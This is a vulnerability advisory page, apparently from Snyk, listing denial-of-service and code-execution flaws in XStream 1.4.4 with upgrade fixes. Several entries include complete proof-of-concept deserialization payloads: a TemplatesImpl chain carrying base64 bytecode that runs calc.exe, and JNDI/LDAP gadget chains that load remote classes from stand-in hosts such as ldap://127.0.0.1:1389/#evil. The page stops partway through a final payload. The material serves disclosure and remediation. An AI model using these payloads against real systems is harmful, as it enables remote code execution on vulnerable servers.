com.thoughtworks.xstream:xstream@1.4.4 vulnerabilities

Direct Vulnerabilities

Known vulnerabilities in the com.thoughtworks.xstream:xstream package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • M
Denial of Service (DoS)

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Denial of Service (DoS). An attacker can manipulate the processed input stream at unmarshalling time, and replace or inject objects. This can result in a stack overflow calculating a recursive hash set, causing a denial of service.

How to fix Denial of Service (DoS)?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.20 or higher.

[,1.4.20)
  • M
Denial of Service (DoS)

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Denial of Service (DoS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack overflow.

How to fix Denial of Service (DoS)?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.20 or higher.

[0,1.4.20)
  • H
Denial of Service (DoS)

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Denial of Service (DoS). An attacker can manipulate the processed input stream and replace or inject objects, that result in exponential recursively hashcode calculation,

How to fix Denial of Service (DoS)?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.19 or higher.

[,1.4.19)
  • H
Arbitrary Code Execution

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. A user is only affected if using the version out of the box with JDK 1.7u21 or below. However, this scenario can be adjusted easily to an external Xalan that works regardless of the version of the Java runtime. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.

PoC

<linked-hash-set>
  <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization='custom'>
    <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
      <default>
        <__name>Pwnr</__name>
        <__bytecodes>
          <byte-array>yv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEACGNhbGMuZXhlCAAwAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA1TdGFja01hcFRhYmxlAQAeeXNvc2VyaWFsL1B3bmVyNDE2NTkyOTE1MTgwNjAwAQAgTHlzb3NlcmlhbC9Qd25lcjQxNjU5MjkxNTE4MDYwMDsAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAvAA4AAAAMAAEAAAAFAA8AOAAAAAEAEwAUAAIADAAAAD8AAAADAAAAAbEAAAACAA0AAAAGAAEAAAA0AA4AAAAgAAMAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAFwAYAAIAGQAAAAQAAQAaAAEAEwAbAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAA4AA4AAAAqAAQAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAHAAdAAIAAAABAB4AHwADABkAAAAEAAEAGgAIACkACwABAAwAAAAkAAMAAgAAAA+nAAMBTLgALxIxtgA1V7EAAAABADYAAAADAAEDAAIAIAAAAAIAIQARAAAACgABAAIAIwAQAAk=</byte-array>
          <byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ</byte-array>
        </__bytecodes>
        <__transletIndex>-1</__transletIndex>
        <__indentNumber>0</__indentNumber>
      </default>
    </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
  </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
  <dynamic-proxy>
    <interface>javax.xml.transform.Templates</interface>
    <handler class='sun.reflect.annotation.AnnotationInvocationHandler' serialization='custom'>
      <sun.reflect.annotation.AnnotationInvocationHandler>
        <default>
          <memberValues>
            <entry>
              <string>f5a5a608</string>
              <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl reference='../../../../../../../com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl'/>
            </entry>
          </memberValues>
          <type>javax.xml.transform.Templates</type>
        </default>
      </sun.reflect.annotation.AnnotationInvocationHandler>
    </handler>
  </dynamic-proxy>
</linked-hash-set>
XStream xstream = new XStream();
xstream.fromXML(xml);

How to fix Arbitrary Code Execution?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.

[,1.4.18)
  • H
Arbitrary Code Execution

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.

PoC

<javax.swing.event.EventListenerList serialization='custom'>
  <javax.swing.event.EventListenerList>
    <default>
      <listenerList>
        <javax.swing.undo.UndoManager>
          <hasBeenDone>true</hasBeenDone>
          <alive>true</alive>
          <inProgress>true</inProgress>
          <edits>
            <com.sun.xml.internal.ws.api.message.Packet>
              <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
                <parsedMessage>true</parsedMessage>
                <soapVersion>SOAP_11</soapVersion>
                <bodyParts/>
                <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
                  <attachmentsInitialized>false</attachmentsInitialized>
                  <multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>
                    <soapPart/>
                    <mm>
                      <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
                        <aliases class='com.sun.jndi.ldap.LdapBindingEnumeration'>
                          <cleaned>false</cleaned>
                          <entries>
                            <com.sun.jndi.ldap.LdapEntry>
                              <DN>cn=four,cn=three,cn=two,cn=one</DN>
                              <attributes class='javax.naming.directory.BasicAttributes' serialization='custom'>
                                <javax.naming.directory.BasicAttribute>
                                  <default>
                                    <ignoreCase>false</ignoreCase>
                                  </default>
                                  <int>4</int>
                                  <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
                                    <javax.naming.directory.BasicAttribute>
                                      <default>
                                        <ordered>false</ordered>
                                        <attrID>objectClass</attrID>
                                      </default>
                                      <int>1</int>
                                      <string>javanamingreference</string>
                                    </javax.naming.directory.BasicAttribute>
                                    <com.sun.jndi.ldap.LdapAttribute>
                                      <default>
                                        <rdn class='com.sun.jndi.ldap.LdapName' serialization='custom'>
                                          <com.sun.jndi.ldap.LdapName>
                                            <string>cn=four,cn=three,cn=two,cn=one</string>
                                            <boolean>false</boolean>
                                          </com.sun.jndi.ldap.LdapName>
                                        </rdn>
                                      </default>
                                    </com.sun.jndi.ldap.LdapAttribute>
                                  </com.sun.jndi.ldap.LdapAttribute>
                                  <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
                                    <javax.naming.directory.BasicAttribute>
                                      <default>
                                        <ordered>false</ordered>
                                        <attrID>javaCodeBase</attrID>
                                      </default>
                                      <int>1</int>
                                      <string>http://127.0.0.1:8080/</string>
                                    </javax.naming.directory.BasicAttribute>
                                    <com.sun.jndi.ldap.LdapAttribute>
                                      <default/>
                                    </com.sun.jndi.ldap.LdapAttribute>
                                  </com.sun.jndi.ldap.LdapAttribute>
                                  <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
                                    <javax.naming.directory.BasicAttribute>
                                      <default>
                                        <ordered>false</ordered>
                                        <attrID>javaClassName</attrID>
                                      </default>
                                      <int>1</int>
                                      <string>refObj</string>
                                    </javax.naming.directory.BasicAttribute>
                                    <com.sun.jndi.ldap.LdapAttribute>
                                      <default/>
                                    </com.sun.jndi.ldap.LdapAttribute>
                                  </com.sun.jndi.ldap.LdapAttribute>
                                  <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
                                    <javax.naming.directory.BasicAttribute>
                                      <default>
                                        <ordered>false</ordered>
                                        <attrID>javaFactory</attrID>
                                      </default>
                                      <int>1</int>
                                      <string>ExecTemplateJDK7</string>
                                    </javax.naming.directory.BasicAttribute>
                                    <com.sun.jndi.ldap.LdapAttribute>
                                      <default/>
                                    </com.sun.jndi.ldap.LdapAttribute>
                                  </com.sun.jndi.ldap.LdapAttribute>
                                </javax.naming.directory.BasicAttribute>
                              </attributes>
                            </com.sun.jndi.ldap.LdapEntry>
                          </entries>
                          <limit>2</limit>
                          <posn>0</posn>
                          <homeCtx/>
                          <more>true</more>
                          <hasMoreCalled>true</hasMoreCalled>
                        </aliases>
                      </it>
                    </mm>
                  </multiPart>
                </sm>
              </message>
            </com.sun.xml.internal.ws.api.message.Packet>
          </edits>
          <indexOfNextAdd>0</indexOfNextAdd>
          <limit>100</limit>
        </javax.swing.undo.UndoManager>
      </listenerList>
    </default>
    <string>java.lang.InternalError</string>
    <javax.swing.undo.UndoManager reference='../default/listenerList/javax.swing.undo.UndoManager'/>
    <null/>
  </javax.swing.event.EventListenerList>
</javax.swing.event.EventListenerList>
XStream xstream = new XStream();
xstream.fromXML(xml);

How to fix Arbitrary Code Execution?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.

[,1.4.18)
  • H
Arbitrary Code Execution

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.

PoC

<sorted-set>
  <javax.naming.ldap.Rdn_-RdnEntry>
    <type>test</type>
    <value class='javax.swing.MultiUIDefaults' serialization='custom'>
      <unserializable-parents/>
      <hashtable>
          <default>
            <loadFactor>0.75</loadFactor>
            <threshold>525</threshold>
          </default>
          <int>700</int>
          <int>0</int>
      </hashtable>
      <javax.swing.UIDefaults>
          <default>
            <defaultLocale>zh_CN</defaultLocale>
            <resourceCache/>
          </default>
      </javax.swing.UIDefaults>
      <javax.swing.MultiUIDefaults>
          <default>
            <tables>
            <javax.swing.UIDefaults serialization='custom'>
              <unserializable-parents/>
              <hashtable>
                <default>
                  <loadFactor>0.75</loadFactor>
                  <threshold>525</threshold>
                </default>
                <int>700</int>
                <int>1</int>
                <string>lazyValue</string>
                <javax.swing.UIDefaults_-ProxyLazyValue>
                  <className>javax.naming.InitialContext</className>
                  <methodName>doLookup</methodName>
                  <args>
                    <string>ldap://127.0.0.1:1389/#evil</string>
                  </args>
                </javax.swing.UIDefaults_-ProxyLazyValue>
              </hashtable>
              <javax.swing.UIDefaults>
                <default>
                  <defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>
                  <resourceCache/>
                </default>
              </javax.swing.UIDefaults>
            </javax.swing.UIDefaults>
            </tables>
          </default>
      </javax.swing.MultiUIDefaults>
    </value>
  </javax.naming.ldap.Rdn_-RdnEntry>
  <javax.naming.ldap.Rdn_-RdnEntry>
    <type>test</type>
    <value class='com.sun.org.apache.xpath.internal.objects.XString'>
      <m__obj class='string'>test</m__obj>
    </value>
  </javax.naming.ldap.Rdn_-RdnEntry>
</sorted-set>
XStream xstream = new XStream();
xstream.fromXML(xml);

How to fix Arbitrary Code Execution?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.

[,1.4.18)
  • H
Arbitrary Code Execution

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.

PoC

<sorted-set>
  <javax.naming.ldap.Rdn_-RdnEntry>
    <type>ysomap</type>
    <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
      <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
        <parsedMessage>true</parsedMessage>
        <soapVersion>SOAP_11</soapVersion>
        <bodyParts/>
        <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
          <attachmentsInitialized>false</attachmentsInitialized>
          <multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>
            <soapPart/>
            <mm>
              <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
                <aliases class='com.sun.jndi.toolkit.dir.ContextEnumerator'>
                  <children class='javax.naming.directory.BasicAttribute$ValuesEnumImpl'>
                    <list class='com.sun.xml.internal.dtdparser.SimpleHashtable'>
                      <current>
                        <hash>1</hash>
                        <key class='javax.naming.Binding'>
                          <name>ysomap</name>
                          <isRel>false</isRel>
                            <boundObj class='com.sun.jndi.ldap.LdapReferralContext'>
                              <refCtx class='javax.naming.spi.ContinuationDirContext'>
                                <cpe>
                                  <stackTrace/>
                                  <suppressedExceptions class='java.util.Collections$UnmodifiableRandomAccessList' resolves-to='java.util.Collections$UnmodifiableList'>
                                    <c class='list'/>
                                    <list reference='../c'/>
                                  </suppressedExceptions>
                                  <resolvedObj class='javax.naming.Reference'>
                                    <className>EvilObj</className>
                                    <addrs/>
                                    <classFactory>EvilObj</classFactory>
                                    <classFactoryLocation>http://127.0.0.1:1099/</classFactoryLocation>
                                  </resolvedObj>
                                  <altName class='javax.naming.CompoundName' serialization='custom'>
                                    <javax.naming.CompoundName>
                                      <properties/>
                                      <int>1</int>
                                      <string>ysomap</string>
                                    </javax.naming.CompoundName>
                                  </altName>
                                </cpe>
                              </refCtx>
                              <skipThisReferral>false</skipThisReferral>
                              <hopCount>0</hopCount>
                            </boundObj>
                        </key>
                      </current>
                      <currentBucket>0</currentBucket>
                      <count>0</count>
                      <threshold>0</threshold>
                    </list>
                  </children>
                  <currentReturned>true</currentReturned>
                  <currentChildExpanded>false</currentChildExpanded>
                  <rootProcessed>true</rootProcessed>
                  <scope>2</scope>
                </aliases>
              </it>
            </mm>
          </multiPart>
        </sm>
      </message>
    </value>
  </javax.naming.ldap.Rdn_-RdnEntry>
  <javax.naming.ldap.Rdn_-RdnEntry>
    <type>ysomap</type>
    <value class='com.sun.org.apache.xpath.internal.objects.XString'>
      <m__obj class='string'>test</m__obj>
    </value>
  </javax.naming.ldap.Rdn_-RdnEntry>
</sorted-set>
XStream xstream = new XStream();
xstream.fromXML(xml);

How to fix Arbitrary Code Execution?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.

[,1.4.18)
  • H
Arbitrary Code Execution

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.

PoC

<sorted-set>
  <javax.naming.ldap.Rdn_-RdnEntry>
    <type>ysomap</type>
    <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
      <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
        <parsedMessage>true</parsedMessage>
        <soapVersion>SOAP_11</soapVersion>
        <bodyParts/>
        <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
          <attachmentsInitialized>false</attachmentsInitialized>
          <multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>
            <soapPart/>
            <mm>
              <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
                <aliases class='com.sun.jndi.ldap.LdapSearchEnumeration'>
                  <listArg class='javax.naming.CompoundName' serialization='custom'>
                    <javax.naming.CompoundName>
                      <properties/>
                      <int>1</int>
                      <string>ysomap</string>
                    </javax.naming.CompoundName>
                  </listArg>
                  <cleaned>false</cleaned>
                  <res>
                    <msgId>0</msgId>
                    <status>0</status>
                  </res>
                  <enumClnt>
                    <isLdapv3>false</isLdapv3>
                    <referenceCount>0</referenceCount>
                    <pooled>false</pooled>
                    <authenticateCalled>false</authenticateCalled>
                  </enumClnt>
                  <limit>1</limit>
                  <posn>0</posn>
                  <homeCtx>
                    <__contextType>0</__contextType>
                    <port__number>1099</port__number>
                    <hostname>127.0.0.1</hostname>
                    <clnt reference='../../enumClnt'/>
                    <handleReferrals>0</handleReferrals>
                    <hasLdapsScheme>true</hasLdapsScheme>
                    <netscapeSchemaBug>false</netscapeSchemaBug>
                    <referralHopLimit>0</referralHopLimit>
                    <batchSize>0</batchSize>
                    <deleteRDN>false</deleteRDN>
                    <typesOnly>false</typesOnly>
                    <derefAliases>0</derefAliases>
                    <addrEncodingSeparator/>
                    <connectTimeout>0</connectTimeout>
                    <readTimeout>0</readTimeout>
                    <waitForReply>false</waitForReply>
                    <replyQueueSize>0</replyQueueSize>
                    <useSsl>false</useSsl>
                    <useDefaultPortNumber>false</useDefaultPortNumber>
                    <parentIsLdapCtx>false</parentIsLdapCtx>
                    <hopCount>0</hopCount>
                    <unsolicited>false</unsolicited>
                    <sharable>false</sharable>
                    <enumCount>1</enumCount>
                    <closeRequested>false</closeRequested>
                  </homeCtx>
                  <more>true</more>
                  <hasMoreCalled>true</hasMoreCalled>
                  <startName class='javax.naming.ldap.LdapName' serialization='custom'>
                    <javax.naming.ldap.LdapName>
                      <default/>
                      <string>uid=ysomap,ou=oa,dc=example,dc=com</string>
                    </javax.naming.ldap.LdapName>
                  </startName>
                  <searchArgs>
                    <name class='javax.naming.CompoundName' reference='../../listArg'/>
                    <filter>ysomap</filter>
                    <cons>
                      <searchScope>1</searchScope>
                      <timeLimit>0</timeLimit>
                      <derefLink>false</derefLink>
                      <returnObj>true</returnObj>
                      <countLimit>0</countLimit>
                    </cons>
                    <reqAttrs/>
                  </searchArgs>
                  <entries>
                    <com.sun.jndi.ldap.LdapEntry>
                      <DN>uid=songtao.xu,ou=oa,dc=example,dc=com</DN>
                      <attributes class='javax.naming.directory.BasicAttributes' serialization='custom'>
                        <default>
                          <ignoreCase>false</ignoreCase>
                        </default>
                        <int>4</int>
                        <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
                          <javax.naming.directory.BasicAttribute>
                            <default>
                              <ordered>false</ordered>
                              <attrID>objectClass</attrID>
                            </default>
                            <int>1</int>
                            <string>javaNamingReference</string>
                          </javax.naming.directory.BasicAttribute>
                          <com.sun.jndi.ldap.LdapAttribute>
                            <default>
                              <rdn class=''javax.naming.CompositeName'' serialization=''custom''>
                                <javax.naming.CompositeName>
                                  <int>0</int>
                                </javax.naming.CompositeName>
                              </rdn>
                            </default>
                          </com.sun.jndi.ldap.LdapAttribute>
                        </com.sun.jndi.ldap.LdapAttribute>
                        <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
                          <javax.naming.directory.BasicAttribute>
                            <default>
                              <ordered>false</ordered>
                              <attrID>javaCodeBase</attrID>
                            </default>
                            <int>1</int>
                            <string>http://127.0.0.1/</string>
                          </javax.naming.directory.BasicAttribute>
                          <com.sun.jndi.ldap.LdapAttribute>
                            <default>
                              <rdn class=''javax.naming.CompositeName'' serialization=''custom''>
                                <javax.naming.CompositeName>
                                  <int>0</int>
                                </javax.naming.CompositeName>
                              </rdn>
                            </default>
                          </com.sun.jndi.ldap.LdapAttribute>
                        </com.sun.jndi.ldap.LdapAttribute>
                        <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
                          <javax.naming.directory.BasicAttribute>
                            <default>
                              <ordered>false</ordered>
                              <attrID>javaClassName</attrID>
                            </default>
                            <int>1</int>
                            <string>foo</string>
                          </javax.naming.directory.BasicAttribute>
                          <com.sun.jndi.ldap.LdapAttribute>
                            <default>
                              <rdn class=''javax.naming.CompositeName'' serialization=''custom''>
                                <javax.naming.CompositeName>
                                  <int>0</int>
                                </javax.naming.CompositeName>
                              </rdn>
                            </default>
                          </com.sun.jndi.ldap.LdapAttribute>
                        </com.sun.jndi.ldap.LdapAttribute>
                        <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
                          <javax.naming.directory.BasicAttribute>
                            <default>
                              <ordered>false</ordered>
                              <attrID>javaFactory</attrID>
                            </default>
                            <int>1</int>
                            <string>EvilObj</string>
                          </javax.naming.directory.BasicAttribute>
                          <com.sun.jndi.ldap.LdapAttribute>
                            <default>
                              <rdn class=''javax.naming.CompositeName'' serialization=''custom''>
                                <javax.naming.CompositeName>
                                  <int>0</int>
                                </javax.naming.CompositeName>
                              </rdn>
                            </default>
                          </com.sun.jndi.ldap.LdapAttribute>
                        </com.sun.jndi.ldap.LdapAttribute>
                      </attributes>
                    </com.sun.jndi.ldap.LdapEntry>
                  </entries>
                </aliases>
              </it>
            </mm>
          </multiPart>
        </sm>
      </message>
    </value>
  </javax.naming.ldap.Rdn_-RdnEntry>
  <javax.naming.ldap.Rdn_-RdnEntry>
    <type>ysomap</type>
    <value class='com.sun.org.apache.xpath.internal.objects.XString'>
      <m__obj class='string'>test</m__obj>
    </value>
  </javax.naming.ldap.Rdn_-RdnEntry>
</sorted-set>
XStream xstream = new XStream();
xstream.fromXML(xml);

How to fix Arbitrary Code Execution?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.

[,1.4.18)
  • H
Remote Code Execution (RCE)

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Remote Code Execution (RCE). This vulnerability may allow a remote attacker that has sufficient rights to execute commands on the host only by manipulating the processed input stream. No user is affected who followed the recommendation to set up XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 no longer uses a blacklist by default, since it cannot be secured for general purposes.

How to fix Remote Code Execution (RCE)?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.

[,1.4.18)
  • H
Arbitrary Code Execution

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.

PoC

<sorted-set>
  <javax.naming.ldap.Rdn_-RdnEntry>
    <type>ysomap</type>
    <value class='javax.swing.MultiUIDefaults' serialization='custom'>
      <unserializable-parents/>
      <hashtable>
        <default>
          <loadFactor>0.75</loadFactor>
          <threshold>525</threshold>
        </default>
        <int>700</int>
        <int>0</int>
      </hashtable>
      <javax.swing.UIDefaults>
        <default>
          <defaultLocale>zh_CN</defaultLocale>
          <resourceCache/>
        </default>
      </javax.swing.UIDefaults>
      <javax.swing.MultiUIDefaults>
        <default>
          <tables>
            <javax.swing.UIDefaults serialization='custom'>
              <unserializable-parents/>
              <hashtable>
                <default>
                  <loadFactor>0.75</loadFactor>
                  <threshold>525</threshold>
                </default>
                <int>700</int>
                <int>1</int>
                <string>ggg</string>
                <javax.swing.UIDefaults_-ProxyLazyValue>
                  <className>javax.naming.InitialContext</className>
                  <methodName>doLookup</methodName>
                  <args>
                    <arg>ldap://localhost:1099/CallRemoteMethod</arg>
                  </args>
                </javax.swing.UIDefaults_-ProxyLazyValue>
              </hashtable>
              <javax.swing.UIDefaults>
                <default>
                  <defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>
                  <resourceCache/>
                </default>
              </javax.swing.UIDefaults>
            </javax.swing.UIDefaults>
          </tables>
        </default>
      </javax.swing.MultiUIDefaults>
    </value>
  </javax.naming.ldap.Rdn_-RdnEntry>
  <javax.naming.ldap.Rdn_-RdnEntry>
    <type>ysomap</type>
    <value class='com.sun.org.apache.xpath.internal.objects.XString'>
      <m__obj class='string'>test</m__obj>
    </value>
  </javax.naming.ldap.Rdn_-RdnEntry>
</sorted-set>
XStream xstream = new XStream();
xstream.fromXML(xml);

How to fix Arbitrary Code Execution?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.

[,1.4.18)
  • H
Arbitrary Code Execution

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.

PoC

<linked-hash-set>
  <dynamic-proxy>
    <interface>map</interface>
    <handler class='com.sun.corba.se.spi.orbutil.proxy.CompositeInvocationHandlerImpl'>
      <classToInvocationHandler class='linked-hash-map'/>
      <defaultHandler class='sun.tracing.NullProvider'>
        <active>true</active>
        <providerType>java.lang.Object</providerType>
        <probes>
          <entry>
            <method>
              <class>java.lang.Object</class>
              <name>hashCode</name>
              <parameter-types/>
            </method>
            <sun.tracing.dtrace.DTraceProbe>
              <proxy class='com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' serialization='custom'/>
                <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
                  <default>
                    <__name>Pwnr</__name>
                    <__bytecodes>
